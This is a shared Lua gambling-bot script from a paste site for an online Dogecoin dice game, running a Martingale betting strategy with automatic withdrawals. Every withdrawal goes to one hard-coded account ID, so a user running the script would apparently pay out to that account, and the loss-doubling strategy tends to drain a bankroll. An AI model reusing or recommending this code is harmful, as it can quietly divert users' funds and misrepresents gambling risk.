999 script


SUBMITTED BY: jasonmiville

DATE: Dec. 23, 2017, 3:42 a.m.

FORMAT: Text only

SIZE: 1.8 kB

HITS: 453

  1. --Martingale v.1
  2. --variable
  3. enablezz=true
  4. enablesrc=true
  5. base=0.1
  6. nextbet=base
  7. chance=58.8
  8. wamount=2
  9. kamount=10
  10. fee=1
  11. adress=A6J5mDZGLa5CZMPBambikEGWvBTpvKyQpG
  12. goal=balance+wamount+fee+kamount
  13. wincount=0
  14. wmultiply=1.0001
  15. lmultiply=2.4
  16. startbalance=balance
  17. moneyvalue=0.006597
  18. invest=0
  19. amountinvest=10
  20. investcount=0
  21. investstart=balance
  22. investid='153930774'
  23. totalinvest=0
  24. --end variable
  25. function dobet()
  26. if invest==0 then
  27. investstart=balance
  28. end
  29. if win then
  30. if wincount==0 then
  31. nextbet=base*wmultiply
  32. wincount=wincount+1
  33. else
  34. nextbet=nextbet*wmultiply
  35. wincount=wincount+1
  36. end
  37. if goal<=balance then
  38. tosend=wamount+fee
  39. withdraw(tosend,'153930774')
  40. ching()
  41. print('')
  42. print('WITHDRAW COMPLETED!!')
  43. print('')
  44. goal=goal+kamount
  45. --investor script
  46. verifinvest=amountinvest*2
  47. if invest==1 and wamount<=investcount then
  48. if verifinvest<totalinvest then
  49. invest=0
  50. end
  51. totalinvest=string.format("%.8f",totalinvest+investcount)
  52. withdraw(totalinvest,investid)
  53. print('')
  54. print('INVESTOR WITHDRAW COMPLETED!!')
  55. print('')
  56. end
  57. --investor script end
  58. resetseed()
  59. end
  60. else
  61. nextbet = nextbet*lmultiply
  62. wincount=0
  63. end
  64. profit1=string.format("%.8f",balance-startbalance)
  65. print('')
  66. print('Balance: '..string.format("%.8f",balance))
  67. print('Real cash: '..string.format("%.4f",balance*moneyvalue)..' USD')
  68. print('profit: '..string.format("%.4f",profit1*moneyvalue)..' USD ('..string.format("%.8f",profit1)..' Doge)')
  69. if invest==1 then
  70. investprof=string.format("%.8f",balance-investstart)
  71. investcount=string.format("%.8f",(investprof*5)/100)
  72. print('profit investor: '..string.format("%.4f",investcount*moneyvalue)..' USD ('..string.format("%.8f",investcount)..' Doge)')
  73. end
  74. print('Goal: '..goal..' ('..string.format("%.2f",balance*100/goal)..' %)')
  75. print('')
  76. end

comments powered by Disqus